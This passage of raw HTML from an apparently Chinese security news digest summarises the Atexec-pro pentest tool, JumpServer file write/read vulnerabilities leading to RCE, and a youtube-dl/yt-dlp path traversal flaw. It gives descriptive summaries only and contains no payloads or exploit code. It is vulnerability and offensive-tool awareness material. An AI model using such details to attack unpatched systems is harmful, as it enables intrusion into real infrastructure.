8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Atexec-pro工具的设计目的是为了提供一个不依赖端口445的渗透测试工具，通过任务调度器（Task Scheduler）执行命令，增强渗透测试的灵活性和隐蔽性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">功能支持方面，Atexec-pro提供了多种操作，包括命令执行、PS命令执行、文件上传、文件下载和.Net程序集执行，但目前对于文件大小有限制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全性考虑，尽管Atexec-pro支持多种认证方式，但它并不提供绕过AMSI的能力，这意味着用户需要确保其他方面的安全措施，以避免被Windows Defender检测到。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">易用性和配置性，Atexec-pro提供了详细的命令行参数选项，使得用户可以根据需要配置和使用该工具，包括接口选择、编码格式、认证方式等。</section></li></ul>
	<br/>
	<p>🏷️: 渗透测试, 任务调度器, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x02
			 JumpServer v3.0.0-v3.10.11 存在任意文件写入漏洞导致远程代码执行</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">JumpServer v3.0.0-v3.10.11 存在安全漏洞，攻击者可利用 Ansible 播种书（playbook）编写任意文件，导致 Celery 容器中的远程代码执行（RCE），进而可能窃取所有主机的秘密、创建具有管理员权限的新 JumpServer 账户或以其他方式操纵数据库。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkDIWMOiawcGPgNkP6TIq4bxvPM62ANWTJVMK6oRukLibprQu02Cib2kFmA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkDIWMOiawcGPgNkP6TIq4bxvPM62ANWTJVMK6oRukLibprQu02Cib2kFmA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522184451152152"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">JumpServer 的特定版本（v3.0.0-v3.10.11）存在安全漏洞，可能导致严重的安全后果。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过 Ansible 播种书（playbook）编写任意文件，这可能导致 Celery 容器中的远程代码执行（RCE）。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">由于 Celery 容器具有 root 权限和数据库访问权限，攻击者可以利用 RCE 来窃取敏感信息、创建管理员账户或操纵数据库。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者需要具有较低权限的账户并能够访问 Job Center 功能，这是一个前提条件。</section></li></ul>
	<br/>
	<p>🏷️: 安全漏洞, 远程代码执行, Ansible, JumpServer</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 JumpServer 安全漏洞：Ansible 剧本模板任意文件读取</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">JumpServer v3.0.0-v3.10.11 版本中存在一个安全漏洞，允许攻击者通过创建恶意的 Ansible 剧本模板来读取 Celery 容器中的任意文件，这可能导致敏感信息泄露。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkxUXem0gTibOnv00wRZxthKndsnx7PZbMzSPTEpS7wrlVtJWsJ2aEgVw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkxUXem0gTibOnv00wRZxthKndsnx7PZbMzSPTEpS7wrlVtJWsJ2aEgVw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522184451151822"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该漏洞主要影响了 JumpServer 的 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">v3.0.0</code> 到 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">v3.10.11</code> 版本。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过 Job Center 功能利用此漏洞，即使是使用低权限账户也能实施攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Celery 容器的 root 权限和数据库访问权限增加了漏洞的严重性，因为它允许攻击者获取敏感信息或进行进一步的攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">强烈建议 用户升级到 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">v3.10.12</code> 或 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">v4.0.0</code> 版本以确保安全。</section></li></ul>
	<br/>
	<p>🏷️: 安全漏洞, Ansible, JumpServer, 信息泄露</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 CVE-2024-38519: youtube-dl 及 yt-dlp 的路径遍历漏洞导致 RCE</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">安全实验室发现youtube-dl及yt-dlp在处理字幕文件时存在Path Traversal漏洞，可能导致远程代码执行（RCE）。</span>
		</p>
	</blockquote>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="网络安全速报" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkp9iclgHZlDVl2SfXbAt387uXlm5qvqPtvz5prYXMdIA6Y8BXlDAG0Iw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmjr11OHn3icLket3eaqgExkp9iclgHZlDVl2SfXbAt387uXlm5qvqPtvz5prYXMdIA6Y8BXlDAG0Iw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855412224148851"></mp-common-miniprogram>
	</section>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3>
	<ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">youtube-dl及yt-dlp的安全漏洞源于对字幕文件扩展名的不充分验证，导致Path Traversal漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">yt-dlp是youtube-dl的分支，自youtube-dl停止维护后，yt-dlp已成为大多数用户的首选视频下载工具。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Path Traversal漏洞可能允许攻击者执行远程代码（RCE），这是因为在构建字幕文件名时，不存在的路径被允许，特别是在Windows系统上。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全实验室提供的XML示例展示了如何利用这一漏洞，通过托管恶意XML文件来实现RCE。</section></li></ul>
	<br/>
	<p>🏷️: CVE, youtube-dl, yt-dlp, 路径遍历, RCE</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 OpenAI发布成本效益高的GPT-4o mini模型</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 